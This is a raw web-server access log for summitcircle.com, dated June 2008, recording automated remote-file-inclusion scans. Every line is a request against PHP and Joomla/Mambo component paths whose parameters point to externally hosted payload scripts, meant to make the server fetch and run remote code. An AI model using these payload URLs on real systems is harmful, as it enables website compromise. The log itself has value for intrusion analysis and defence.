216.118.97.213 - - [30/Jun/2008:06:09:45 -0700] "GET /logs/modules/Neos_Chronos/header.php?base_folder=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
202.57.1.181 - - [30/Jun/2008:06:10:06 -0700] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
64.79.220.3 - - [30/Jun/2008:06:10:12 -0700] "GET /logs/http://itin.web44.net/arquivos/id.txt?? HTTP/1.1" 404 275 "-" "Advanced Browser (http://www.avantbrowser.com)" "summitcircle.com"
64.79.220.3 - - [30/Jun/2008:06:10:12 -0700] "GET /http://itin.web44.net/arquivos/id.txt?? HTTP/1.1" 404 275 "-" "Advanced Browser (http://www.avantbrowser.com)" "summitcircle.com"
67.228.115.66 - - [30/Jun/2008:06:10:19 -0700] "GET /logs/access.log//modules/vwar/admin/admin.php?vwar_root=http://avast4ever.xpg.com.br/TT??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
72.10.47.122 - - [30/Jun/2008:06:10:28 -0700] "GET //modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.archfuck.ru/administrator/components/com_remository/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.summitcircle.com"
72.10.47.122 - - [30/Jun/2008:06:10:28 -0700] "GET //modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://dannaoui.com/Mambo/images/img/paddy?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.summitcircle.com"
200.55.206.49 - - [30/Jun/2008:06:10:36 -0700] "GET /logs/access_071231.log//templates/default/header.inc.php?menu=http://www.userena.cl/dgae/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "summitcircle.com"
200.55.206.49 - - [30/Jun/2008:06:10:36 -0700] "GET //templates/default/header.inc.php?menu=http://www.userena.cl/dgae/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "summitcircle.com"
200.55.206.49 - - [30/Jun/2008:06:10:37 -0700] "GET /logs//templates/default/header.inc.php?menu=http://www.userena.cl/dgae/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "summitcircle.com"
67.15.70.45 - - [30/Jun/2008:06:10:53 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.summitcircle.com"
67.15.70.45 - - [30/Jun/2008:06:10:53 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.summitcircle.com"
67.15.70.45 - - [30/Jun/2008:06:10:53 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.summitcircle.com"
67.15.70.45 - - [30/Jun/2008:06:10:53 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.summitcircle.com"
87.230.35.101 - - [30/Jun/2008:06:10:53 -0700] "GET /index.php?x=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "summitcircle.com"
82.194.70.164 - - [30/Jun/2008:06:11:18 -0700] "GET /logs/access.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://74.55.118.130/~consult/shop/classes/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
82.194.70.164 - - [30/Jun/2008:06:11:18 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://74.55.118.130/~consult/shop/classes/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
82.194.70.164 - - [30/Jun/2008:06:11:19 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://74.55.118.130/~consult/shop/classes/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
201.218.50.7 - - [30/Jun/2008:06:12:03 -0700] "GET /logs/access_071029.log//components/com_simpleboard/image_upload.php?sbp=http://evro-set.ru/modules/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
78.129.220.45 - - [30/Jun/2008:06:12:29 -0700] "GET /logs/access_080211.log/includes/footer.php?systempath=http://www.secret-passions.de/modules/Downloads/docs/thumbs/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
78.129.220.45 - - [30/Jun/2008:06:12:29 -0700] "GET /includes/footer.php?systempath=http://www.secret-passions.de/modules/Downloads/docs/thumbs/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
78.129.220.45 - - [30/Jun/2008:06:12:29 -0700] "GET /logs/includes/footer.php?systempath=http://www.secret-passions.de/modules/Downloads/docs/thumbs/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
78.129.220.45 - - [30/Jun/2008:06:12:40 -0700] "GET /logs/access_080406.log/includes/footer.php?systempath=http://www.secret-passions.de/modules/Downloads/docs/thumbs/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
219.94.128.213 - - [30/Jun/2008:06:12:42 -0700] "GET /index3.php?http://itin.web44.net/arquivos/id.txt?? HTTP/1.1" 404 275 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "summitcircle.com"
219.94.128.213 - - [30/Jun/2008:06:12:42 -0700] "GET /logs/index3.php?http://itin.web44.net/arquivos/id.txt?? HTTP/1.1" 404 275 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "summitcircle.com"
216.118.97.213 - - [30/Jun/2008:06:13:07 -0700] "GET /logs/access.log/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
216.118.97.213 - - [30/Jun/2008:06:13:07 -0700] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
216.118.97.213 - - [30/Jun/2008:06:13:07 -0700] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
82.194.70.164 - - [30/Jun/2008:06:13:15 -0700] "GET /logs/access.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://74.55.118.130/~consult/shop/classes/safe.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
82.194.70.164 - - [30/Jun/2008:06:13:15 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://74.55.118.130/~consult/shop/classes/safe.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
82.194.70.164 - - [30/Jun/2008:06:13:15 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://74.55.118.130/~consult/shop/classes/safe.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
209.250.234.226 - - [30/Jun/2008:06:13:26 -0700] "GET /logs/access_080211.log/includes/footer.php?systempath=http://210.60.110.116/news/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
209.250.234.226 - - [30/Jun/2008:06:13:26 -0700] "GET /includes/footer.php?systempath=http://210.60.110.116/news/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
209.250.234.226 - - [30/Jun/2008:06:13:26 -0700] "GET /logs/includes/footer.php?systempath=http://210.60.110.116/news/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
86.59.80.71 - - [30/Jun/2008:06:13:31 -0700] "GET /logs/access_071119.log//modules/TotalCalendar/about.php?inc_dir=http://itmovement.com/taxy/templates_nogui/editor/_samples/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
121.124.127.40 - - [30/Jun/2008:06:13:32 -0700] "GET /errors.php?error=http://www.concurs.org/tst.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
209.250.234.226 - - [30/Jun/2008:06:14:00 -0700] "GET /logs/access_080406.log/includes/footer.php?systempath=http://210.60.110.116/news/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
64.105.33.158 - - [30/Jun/2008:06:14:19 -0700] "GET /logs/access_070924.log//?mosConfig_absolute_path=http://203.113.6.34/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
64.105.33.158 - - [30/Jun/2008:06:14:19 -0700] "GET /logs/access_070924.log//?mosConfig_absolute_path=http://203.113.6.34/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
209.250.234.226 - - [30/Jun/2008:06:14:32 -0700] "GET /logs/access.log/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://210.60.110.116/news/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
209.250.234.226 - - [30/Jun/2008:06:14:32 -0700] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://210.60.110.116/news/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
209.250.234.226 - - [30/Jun/2008:06:14:32 -0700] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://210.60.110.116/news/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
219.111.8.239 - - [30/Jun/2008:06:14:47 -0700] "GET /index3.php?http://itin.web44.net/arquivos/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "summitcircle.com"
219.111.8.239 - - [30/Jun/2008:06:14:47 -0700] "GET /logs/index3.php?http://itin.web44.net/arquivos/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "summitcircle.com"
219.94.162.56 - - [30/Jun/2008:06:15:00 -0700] "GET /index3.php?http://itin.web44.net/arquivos/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "summitcircle.com"
219.94.162.56 - - [30/Jun/2008:06:15:00 -0700] "GET /logs/index3.php?http://itin.web44.net/arquivos/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "summitcircle.com"
78.129.220.45 - - [30/Jun/2008:06:16:16 -0700] "GET /logs/access_070806.log/booth.php?include_path=http://geocities.com/lovenuckek/skanx.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
78.129.220.45 - - [30/Jun/2008:06:16:16 -0700] "GET /booth.php?include_path=http://geocities.com/lovenuckek/skanx.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
78.129.220.45 - - [30/Jun/2008:06:16:16 -0700] "GET /logs/booth.php?include_path=http://geocities.com/lovenuckek/skanx.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
78.129.220.45 - - [30/Jun/2008:06:16:18 -0700] "GET /logs/access_070806.log/booth.php?include_path=http://geocities.com/lovenuckek/skanx.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
78.129.220.45 - - [30/Jun/2008:06:16:19 -0700] "GET /booth.php?include_path=http://geocities.com/lovenuckek/skanx.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
78.129.220.45 - - [30/Jun/2008:06:16:19 -0700] "GET /logs/booth.php?include_path=http://geocities.com/lovenuckek/skanx.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
61.222.167.228 - - [30/Jun/2008:06:16:20 -0700] "GET /logs/access_070924.log//login.php?dir=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
121.124.127.40 - - [30/Jun/2008:06:16:35 -0700] "GET /logs/access_071029.log/errors.php?error=http://www.concurs.org/tst.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
121.124.127.40 - - [30/Jun/2008:06:16:36 -0700] "GET /errors.php?error=http://www.concurs.org/tst.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
121.124.127.40 - - [30/Jun/2008:06:16:36 -0700] "GET /logs/errors.php?error=http://www.concurs.org/tst.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
78.129.220.45 - - [30/Jun/2008:06:17:23 -0700] "GET /logs/access_070813.log/booth.php?include_path=http://geocities.com/lovenuckek/skanx.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
78.129.220.45 - - [30/Jun/2008:06:17:23 -0700] "GET /logs/access_070813.log/booth.php?include_path=http://geocities.com/lovenuckek/skanx.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
87.230.35.101 - - [30/Jun/2008:06:17:34 -0700] "GET /index2.php?lg=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "summitcircle.com"
219.94.155.28 - - [30/Jun/2008:06:18:02 -0700] "GET /index3.php?http://itin.web44.net/arquivos/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "summitcircle.com"
219.94.155.28 - - [30/Jun/2008:06:18:02 -0700] "GET /logs/index3.php?http://itin.web44.net/arquivos/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "summitcircle.com"
202.181.99.14 - - [30/Jun/2008:06:18:10 -0700] "GET /logs/index3.php?http://itin.web44.net/arquivos/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "summitcircle.com"
69.89.31.88 - - [30/Jun/2008:06:18:10 -0700] "GET /logs/access_071224.log/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://claro3g.freehostia.com/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.summitcircle.com"
69.89.31.88 - - [30/Jun/2008:06:18:10 -0700] "GET /logs/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://claro3g.freehostia.com/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.summitcircle.com"
69.89.31.88 - - [30/Jun/2008:06:18:10 -0700] "GET /logs/access_070924.log/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://claro3g.freehostia.com/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.summitcircle.com"
202.181.99.14 - - [30/Jun/2008:06:18:10 -0700] "GET /index3.php?http://itin.web44.net/arquivos/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "summitcircle.com"
121.124.127.40 - - [30/Jun/2008:06:18:26 -0700] "GET /logs/access_071029.log/index.php?page=http://www.concurs.org/tst.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
121.124.127.40 - - [30/Jun/2008:06:18:26 -0700] "GET /index.php?page=http://www.concurs.org/tst.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
121.124.127.40 - - [30/Jun/2008:06:18:27 -0700] "GET /logs/index.php?page=http://www.concurs.org/tst.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
194.150.224.92 - - [30/Jun/2008:06:18:39 -0700] "GET /logs/access_080121.log//administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://itmovement.com/taxy/templates_nogui/editor/_samples/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
194.150.224.92 - - [30/Jun/2008:06:18:40 -0700] "GET //administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://itmovement.com/taxy/templates_nogui/editor/_samples/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
194.150.224.92 - - [30/Jun/2008:06:18:40 -0700] "GET /logs//administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://itmovement.com/taxy/templates_nogui/editor/_samples/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
72.10.47.122 - - [30/Jun/2008:06:18:41 -0700] "GET //modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://dannaoui.com/Mambo/images/img/paddy?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.summitcircle.com"
72.10.47.122 - - [30/Jun/2008:06:18:52 -0700] "GET //modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.archfuck.ru/administrator/components/com_remository/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.summitcircle.com"
195.14.1.101 - - [30/Jun/2008:06:19:27 -0700] "GET /logs/access_080121.log//administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://perevorot.org/cache/tits.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
195.14.1.101 - - [30/Jun/2008:06:19:27 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://perevorot.org/cache/tits.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
195.14.1.101 - - [30/Jun/2008:06:19:28 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://perevorot.org/cache/tits.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
78.129.220.45 - - [30/Jun/2008:06:20:05 -0700] "GET /logs/booth.php?include_path=http://geocities.com/lovenuckek/skanx.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
78.129.220.45 - - [30/Jun/2008:06:20:05 -0700] "GET /booth.php?include_path=http://geocities.com/lovenuckek/skanx.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
121.124.127.40 - - [30/Jun/2008:06:20:07 -0700] "GET /errors.php?error=http://www.concurs.org/tst.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
78.129.220.45 - - [30/Jun/2008:06:20:09 -0700] "GET /logs/booth.php?include_path=http://geocities.com/lovenuckek/skanx.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
78.129.220.45 - - [30/Jun/2008:06:20:09 -0700] "GET /booth.php?include_path=http://geocities.com/lovenuckek/skanx.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
69.89.31.88 - - [30/Jun/2008:06:20:20 -0700] "GET /logs/access.log//stats/modules/My_eGallery/index.php?basepath=http://claro3g.freehostia.com/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.summitcircle.com"
69.89.31.88 - - [30/Jun/2008:06:20:20 -0700] "GET /logs//stats/modules/My_eGallery/index.php?basepath=http://claro3g.freehostia.com/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.summitcircle.com"
64.79.220.3 - - [30/Jun/2008:06:21:02 -0700] "GET /logs/menu.php?http://itin.web44.net/arquivos/id.txt?? HTTP/1.1" 404 275 "-" "Advanced Browser (http://www.avantbrowser.com)" "www.summitcircle.com"
64.79.220.3 - - [30/Jun/2008:06:21:03 -0700] "GET /menu.php?http://itin.web44.net/arquivos/id.txt?? HTTP/1.1" 404 275 "-" "Advanced Browser (http://www.avantbrowser.com)" "www.summitcircle.com"
202.57.1.181 - - [30/Jun/2008:06:21:40 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
62.2.100.138 - - [30/Jun/2008:06:21:40 -0700] "GET /logs/access_071126.log/modules/Neos_Chronos/header.php?base_folder=http://210.60.110.116/news/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "summitcircle.com"
202.57.1.181 - - [30/Jun/2008:06:21:41 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
62.2.100.138 - - [30/Jun/2008:06:21:41 -0700] "GET /modules/Neos_Chronos/header.php?base_folder=http://210.60.110.116/news/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "summitcircle.com"
62.2.100.138 - - [30/Jun/2008:06:21:41 -0700] "GET /logs/modules/Neos_Chronos/header.php?base_folder=http://210.60.110.116/news/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "summitcircle.com"
202.169.224.66 - - [30/Jun/2008:06:21:42 -0700] "GET /logs/access_071231.log/index.php3?act=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "summitcircle.com"
62.2.100.138 - - [30/Jun/2008:06:21:42 -0700] "GET /logs/access_080414.log/modules/Neos_Chronos/header.php?base_folder=http://210.60.110.116/news/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
62.2.100.138 - - [30/Jun/2008:06:21:43 -0700] "GET /modules/Neos_Chronos/header.php?base_folder=http://210.60.110.116/news/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
62.2.100.138 - - [30/Jun/2008:06:21:43 -0700] "GET /logs/modules/Neos_Chronos/header.php?base_folder=http://210.60.110.116/news/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
202.169.224.66 - - [30/Jun/2008:06:21:47 -0700] "GET /logs/index.php3?act=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "summitcircle.com"
201.252.14.147 - - [30/Jun/2008:06:21:51 -0700] "GET /logs/access_080406.log//administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://usuarios.lycos.es/servius/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.summitcircle.com"
201.252.14.147 - - [30/Jun/2008:06:21:52 -0700] "GET //administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://usuarios.lycos.es/servius/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.summitcircle.com"
201.252.14.147 - - [30/Jun/2008:06:21:53 -0700] "GET /logs//administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://usuarios.lycos.es/servius/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.summitcircle.com"
202.63.101.163 - - [30/Jun/2008:06:22:03 -0700] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://210.60.110.116/board/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
202.63.101.163 - - [30/Jun/2008:06:22:07 -0700] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://210.60.110.116/board/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
121.124.127.40 - - [30/Jun/2008:06:22:44 -0700] "GET /logs/access.log/errors.php?error=http://www.concurs.org/tst.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
195.14.1.101 - - [30/Jun/2008:06:23:23 -0700] "GET /logs/access_080127.log//administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://perevorot.org/cache/tits.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
61.222.167.228 - - [30/Jun/2008:06:23:36 -0700] "GET /logs/access_070826.log//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
121.124.127.40 - - [30/Jun/2008:06:24:11 -0700] "GET /logs/access.log/index.php?page=http://www.concurs.org/tst.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
69.89.31.88 - - [30/Jun/2008:06:24:15 -0700] "GET /logs/access_071231.log//stats/modules/My_eGallery/index.php?basepath=http://claro3g.freehostia.com/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "summitcircle.com"
69.89.31.88 - - [30/Jun/2008:06:24:15 -0700] "GET /logs//stats/modules/My_eGallery/index.php?basepath=http://claro3g.freehostia.com/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "summitcircle.com"
216.245.192.26 - - [30/Jun/2008:06:24:26 -0700] "GET /logs/access_071224.log/index.php?option=com_facileforms&Itemid=&mosConfig_absolute_path=http://www.classvogue.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.summitcircle.com"
72.29.87.105 - - [30/Jun/2008:06:24:43 -0700] "GET /logs/access_071224.log/index.php?include=http://fightersoft.ro/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
72.29.87.105 - - [30/Jun/2008:06:24:43 -0700] "GET /index.php?include=http://fightersoft.ro/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
72.29.87.105 - - [30/Jun/2008:06:24:43 -0700] "GET /logs/index.php?include=http://fightersoft.ro/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
216.17.101.237 - - [30/Jun/2008:06:24:44 -0700] "GET /logs/access_080406.log/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.richandrowdyretirement.com/rss.php/index.php/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
69.89.31.88 - - [30/Jun/2008:06:24:56 -0700] "GET /logs/access_080204.log//stats/modules/My_eGallery/index.php?basepath=http://claro3g.freehostia.com/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.summitcircle.com"
62.2.100.138 - - [30/Jun/2008:06:24:59 -0700] "GET /logs/access_080211.log/includes/footer.php?systempath=http://210.60.110.116/news/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
62.2.100.138 - - [30/Jun/2008:06:25:00 -0700] "GET /includes/footer.php?systempath=http://210.60.110.116/news/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
62.2.100.138 - - [30/Jun/2008:06:25:00 -0700] "GET /logs/includes/footer.php?systempath=http://210.60.110.116/news/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
78.129.220.45 - - [30/Jun/2008:06:25:42 -0700] "GET /logs/access_071001.log//?mosConfig_absolute_path=http://geocities.com/lovenuckek/skanx.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
78.129.220.45 - - [30/Jun/2008:06:25:42 -0700] "GET //?mosConfig_absolute_path=http://geocities.com/lovenuckek/skanx.txt? HTTP/1.1" 200 779 "-" "libwww-perl/5.805" "www.summitcircle.com"
78.129.220.45 - - [30/Jun/2008:06:25:43 -0700] "GET /logs//?mosConfig_absolute_path=http://geocities.com/lovenuckek/skanx.txt? HTTP/1.1" 200 10095 "-" "libwww-perl/5.805" "www.summitcircle.com"
78.129.220.45 - - [30/Jun/2008:06:25:45 -0700] "GET /logs/access_071001.log//?mosConfig_absolute_path=http://geocities.com/lovenuckek/skanx.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
